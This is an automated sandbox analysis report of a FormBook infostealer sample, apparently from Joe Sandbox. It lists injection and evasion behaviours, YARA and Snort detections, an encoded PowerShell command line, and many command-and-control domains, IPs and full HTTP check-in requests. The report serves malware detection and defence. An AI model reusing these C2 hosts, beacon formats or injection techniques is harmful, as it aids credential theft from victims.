Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe

Overview

General Information

Sample Name:SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe
Analysis ID:774219
MD5:dafc40b0ca83e739d2733ef7f0ca70f8
SHA1:edb23ac87bc46d6f67e59e35cabcedd2b8b8ba65
SHA256:a1a26ac35276224149ae65aa11a0413e8309e9cdaeb22bde42893a3559387fb7
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Drops executable to a common third party application directory
Machine Learning detection for sample
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe (PID: 1724 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe MD5: DAFC40B0CA83E739D2733EF7F0CA70F8)
    • powershell.exe (PID: 1308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MSBuild.exe (PID: 2244 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe purecrypter.exe MD5: D621FD77BD585874F9686D3A76462EF1)
      • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6012 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.303083113.00000000043C6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000004.00000000.470848798.000000000C907000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x10010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x9277:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000004.00000000.470848798.000000000C907000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x8b11:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x9177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x92ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x7d5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xedc7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xfd7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.830381361.00000000040C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.830381361.00000000040C0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18277:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.3.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.4637bd0.3.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        0.3.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.4457b50.1.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          0.3.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.4477b70.2.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.3.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.44b7b90.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.32b0000.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                Click to see the 5 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.4194.58.112.17449697802031449 12/27/22-10:54:20.411515
                SID:2031449
                Source Port:49697
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4162.254.33.21449701802031412 12/27/22-10:54:37.541792
                SID:2031412
                Source Port:49701
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.225.91.7349703802031449 12/27/22-10:54:45.923196
                SID:2031449
                Source Port:49703
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4162.254.33.21449701802031453 12/27/22-10:54:37.541792
                SID:2031453
                Source Port:49701
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4107.149.40.24749705802031449 12/27/22-10:54:54.148136
                SID:2031449
                Source Port:49705
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4146.148.102.20149709802031453 12/27/22-10:55:10.096352
                SID:2031453
                Source Port:49709
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4141.8.195.12449721802031449 12/27/22-10:56:01.215430
                SID:2031449
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4194.58.112.17449697802031453 12/27/22-10:54:20.411515
                SID:2031453
                Source Port:49697
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4107.149.40.24749705802031412 12/27/22-10:54:54.148136
                SID:2031412
                Source Port:49705
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.488.99.217.19749725802031453 12/27/22-10:56:20.099252
                SID:2031453
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4194.58.112.17449697802031412 12/27/22-10:54:20.411515
                SID:2031412
                Source Port:49697
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4141.8.195.12449721802031412 12/27/22-10:56:01.215430
                SID:2031412
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.488.99.217.19749725802031412 12/27/22-10:56:20.099252
                SID:2031412
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4107.149.40.24749705802031453 12/27/22-10:54:54.148136
                SID:2031453
                Source Port:49705
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4141.8.195.12449721802031453 12/27/22-10:56:01.215430
                SID:2031453
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.488.99.217.19749725802031449 12/27/22-10:56:20.099252
                SID:2031449
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.225.91.7349703802031453 12/27/22-10:54:45.923196
                SID:2031453
                Source Port:49703
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4146.148.102.20149709802031412 12/27/22-10:55:10.096352
                SID:2031412
                Source Port:49709
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4194.58.112.17449728802031412 12/27/22-10:56:34.904156
                SID:2031412
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4194.58.112.17449728802031453 12/27/22-10:56:34.904156
                SID:2031453
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4162.254.33.21449701802031449 12/27/22-10:54:37.541792
                SID:2031449
                Source Port:49701
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4146.148.102.20149709802031449 12/27/22-10:55:10.096352
                SID:2031449
                Source Port:49709
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.464.225.91.7349703802031412 12/27/22-10:54:45.923196
                SID:2031412
                Source Port:49703
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4194.58.112.17449728802031449 12/27/22-10:56:34.904156
                SID:2031449
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeReversingLabs: Detection: 35%
                Yara detected FormBook
                Source: Yara matchFile source: 00000007.00000002.830381361.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.830332751.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Antivirus / Scanner detection for submitted sample
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://www.dubmoviedaaa.com/p6a2/?4u=XXw8ZRfd0&PJsOe=LKTpzSYaad7RY09JlOwiwWKJMKTbKDNtKtFdzgs46VqeU13weoYdOe5FHZNBqvs7M9aWsXvPLdZvpHBZqtvQwjuXQVIPrJpS5Q==Avira URL Cloud: Label: malware
                Source: http://www.cobramierer.com/p6a2/?4u=XXw8ZRfd0&PJsOe=qpkXmqYajFP/MwMsH85/xAR+HuOV3BhXfepUxIkOb3Nti8d1pwDCNiT47pq1pm9vxSngzgxeICaYyJ2YpLhtuPpEAFm4f33eOg==Avira URL Cloud: Label: malware
                Source: http://www.elite-travel-cn.com/p6a2/Avira URL Cloud: Label: malware
                Source: http://www.dubmoviedaaa.com/p6a2/Avira URL Cloud: Label: malware
                Source: http://www.scastive.online/p6a2/Avira URL Cloud: Label: malware
                Source: http://www.elite-travel-cn.com/p6a2/?PJsOe=xeOhXlH059OOkCPPeiyznifX6DCn6GLjVIPb0HMEaj6kEld1NZvpN20tPmlU3A5oPB4rwbGiD40G1zaemtArGBjdZepieKoLuQ==&4u=XXw8ZRfd0Avira URL Cloud: Label: malware
                Source: http://newhard.ru/p6a2/?PJsOe=T7Oc7Ddw1O0v8xiwxjGjB92YwMYIGm5zgL68zmFX3c2O6eqvx6hztOx3eHSliQXWKuFqXfAvira URL Cloud: Label: malware
                Source: http://www.newhard.ru/p6a2/Avira URL Cloud: Label: malware
                Source: http://www.scastive.online/p6a2/?PJsOe=eJZ19xYC8GRyuRPgB3K3hYHN997ZzA7xE9BAJMP39dttW2h4vf6lg00rKUwCf45owTZaCQIOMq2NpT3yCXeggU/kVHtPphUyBg==&4u=XXw8ZRfd0Avira URL Cloud: Label: malware
                Source: http://www.loaddown.vip/p6a2/Avira URL Cloud: Label: malware
                Source: http://www.newhard.ru/p6a2/?PJsOe=T7Oc7Ddw1O0v8xiwxjGjB92YwMYIGm5zgL68zmFX3c2O6eqvx6hztOx3eHSliQXWKuFqXfEa/HBDnsFpMkr8eF2T22317iGL4Q==&4u=XXw8ZRfd0Avira URL Cloud: Label: malware
                Source: http://www.cobramierer.com/p6a2/Avira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Adobe\cloud.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen7
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Adobe\cloud.exeReversingLabs: Detection: 35%
                Machine Learning detection for sample
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeJoe Sandbox ML: detected
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Adobe\cloud.exeJoe Sandbox ML: detected
                Source: 0.0.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.d40000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                Source: 3.0.MSBuild.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: rundll32.exe, 00000007.00000002.828616594.0000000000224000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831896006.0000000004703000.00000004.10000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000003.00000003.389276062.0000000000EE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000003.386822376.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.488819877.000000000422D000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.485902320.0000000004090000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000003.00000003.389276062.0000000000EE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000003.386822376.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000007.00000003.488819877.000000000422D000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.485902320.0000000004090000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: rundll32.exe, 00000007.00000002.828616594.0000000000224000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.831896006.0000000004703000.00000004.10000000.00040000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029C3170 FindFirstFileW,FindNextFileW,FindClose,7_2_029C3170
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_029C3169 FindFirstFileW,FindNextFileW,FindClose,7_2_029C3169
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi7_2_029B8D70
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi7_2_029B4DBF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi7_2_029B8D6F

                Networking

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeDomain query: www.elite-travel-cn.com
                Source: C:\Windows\explorer.exeNetwork Connect: 107.149.40.247 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 88.99.217.197 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: www.3658622bet.com
                Source: C:\Windows\explorer.exeNetwork Connect: 166.88.175.130 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 162.254.33.214 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 64.64.253.213 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 146.148.102.201 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 185.224.170.82 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 64.225.91.73 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: www.realtxt.co.uk
                Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.hiufouwnwk.shop
                Source: C:\Windows\explorer.exeNetwork Connect: 192.46.208.151 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: www.newhard.ru
                Source: C:\Windows\explorer.exeDomain query: www.adelaidesociety.com
                Source: C:\Windows\explorer.exeDomain query: www.cobramierer.com
                Source: C:\Windows\explorer.exeDomain query: www.forumhtc.com
                Source: C:\Windows\explorer.exeDomain query: www.4tx.ru
                Source: C:\Windows\explorer.exeDomain query: www.scastive.online
                Source: C:\Windows\explorer.exeNetwork Connect: 35.213.254.232 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: www.dubmoviedaaa.com
                Source: C:\Windows\explorer.exeDomain query: www.glb-mobility.com
                Source: C:\Windows\explorer.exeNetwork Connect: 176.28.33.25 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 35.77.200.33 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: www.060jinbo.com
                Source: C:\Windows\explorer.exeNetwork Connect: 185.253.34.81 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: www.byfuture.biz
                Source: C:\Windows\explorer.exeDomain query: www.loaddown.vip
                Source: C:\Windows\explorer.exeDomain query: www.bip39chain.info
                Source: C:\Windows\explorer.exeNetwork Connect: 141.8.195.124 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 194.58.112.174 80Jump to behavior
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 194.58.112.174:80
                Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 194.58.112.174:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 194.58.112.174:80
                Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49701 -> 162.254.33.214:80
                Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49701 -> 162.254.33.214:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49701 -> 162.254.33.214:80
                Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 64.225.91.73:80
                Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 64.225.91.73:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 64.225.91.73:80
                Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49705 -> 107.149.40.247:80
                Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49705 -> 107.149.40.247:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49705 -> 107.149.40.247:80
                Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49709 -> 146.148.102.201:80
                Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49709 -> 146.148.102.201:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49709 -> 146.148.102.201:80
                Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 141.8.195.124:80
                Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 141.8.195.124:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49721 -> 141.8.195.124:80
                Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49725 -> 88.99.217.197:80
                Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49725 -> 88.99.217.197:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49725 -> 88.99.217.197:80
                Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49728 -> 194.58.112.174:80
                Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49728 -> 194.58.112.174:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49728 -> 194.58.112.174:80
                Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=pjY5HSUHAkIjJTnjTuXZqIQD+upstRzJTGdDpMtHb2G7EDTOYPy+SC0sAwePybO7Bg4lDq58C8rolUandfOM6VH00Jlr+bNPuQ== HTTP/1.1Host: www.adelaidesociety.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=T7Oc7Ddw1O0v8xiwxjGjB92YwMYIGm5zgL68zmFX3c2O6eqvx6hztOx3eHSliQXWKuFqXfEa/HBDnsFpMkr8eF2T22317iGL4Q==&4u=XXw8ZRfd0 HTTP/1.1Host: www.newhard.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=o0oMI+STs16Mw38KQSkvmmC4P0sg0o0mDw904OgUvxPlTLKfXC9NdymWUu8a4Kbhpw71hSKOgFJzukOjlHXbsoCiidHLGDEsuA== HTTP/1.1Host: www.loaddown.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=eJZ19xYC8GRyuRPgB3K3hYHN997ZzA7xE9BAJMP39dttW2h4vf6lg00rKUwCf45owTZaCQIOMq2NpT3yCXeggU/kVHtPphUyBg==&4u=XXw8ZRfd0 HTTP/1.1Host: www.scastive.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=LKTpzSYaad7RY09JlOwiwWKJMKTbKDNtKtFdzgs46VqeU13weoYdOe5FHZNBqvs7M9aWsXvPLdZvpHBZqtvQwjuXQVIPrJpS5Q== HTTP/1.1Host: www.dubmoviedaaa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=xeOhXlH059OOkCPPeiyznifX6DCn6GLjVIPb0HMEaj6kEld1NZvpN20tPmlU3A5oPB4rwbGiD40G1zaemtArGBjdZepieKoLuQ==&4u=XXw8ZRfd0 HTTP/1.1Host: www.elite-travel-cn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=qpkXmqYajFP/MwMsH85/xAR+HuOV3BhXfepUxIkOb3Nti8d1pwDCNiT47pq1pm9vxSngzgxeICaYyJ2YpLhtuPpEAFm4f33eOg== HTTP/1.1Host: www.cobramierer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=tRwStDBOqpxrJTuJxG0qdx4zeeLq0lB6PIjn8XuQC4/eCDjBGzFZ7gNi69QxogIVbIfegutMJNyvrWeKAaI2x4/UCc3VFVMIlw==&4u=XXw8ZRfd0 HTTP/1.1Host: www.byfuture.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=KR55po+9d10KX8Xj90KZyobZiDa/RtTgSn49Skh//ClUMGayigisS5MQTeINbAsCVfjq5Ep4Iv+TWpG/o+Gu0gk7nNTNW0LRWQ== HTTP/1.1Host: www.forumhtc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=ZZiBudAdKkOjfCQP3JltneA7CA4H+oDcc2F0cF2NCUrgNT/O3PII+zj7tY9WUUQehw4FhZlrF4CxwEcOrzTPe++T19aYNqzGtA==&4u=XXw8ZRfd0 HTTP/1.1Host: www.3658622bet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=guYE1BSZ9235N2CnAWofHh5ttYffxi6Or7I/zjjksNN0K1CgBVtEgiG+Hh20F/wLWeO5bKswCo7tklXGWOtZJphg6sBhJOhSXw== HTTP/1.1Host: www.bip39chain.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
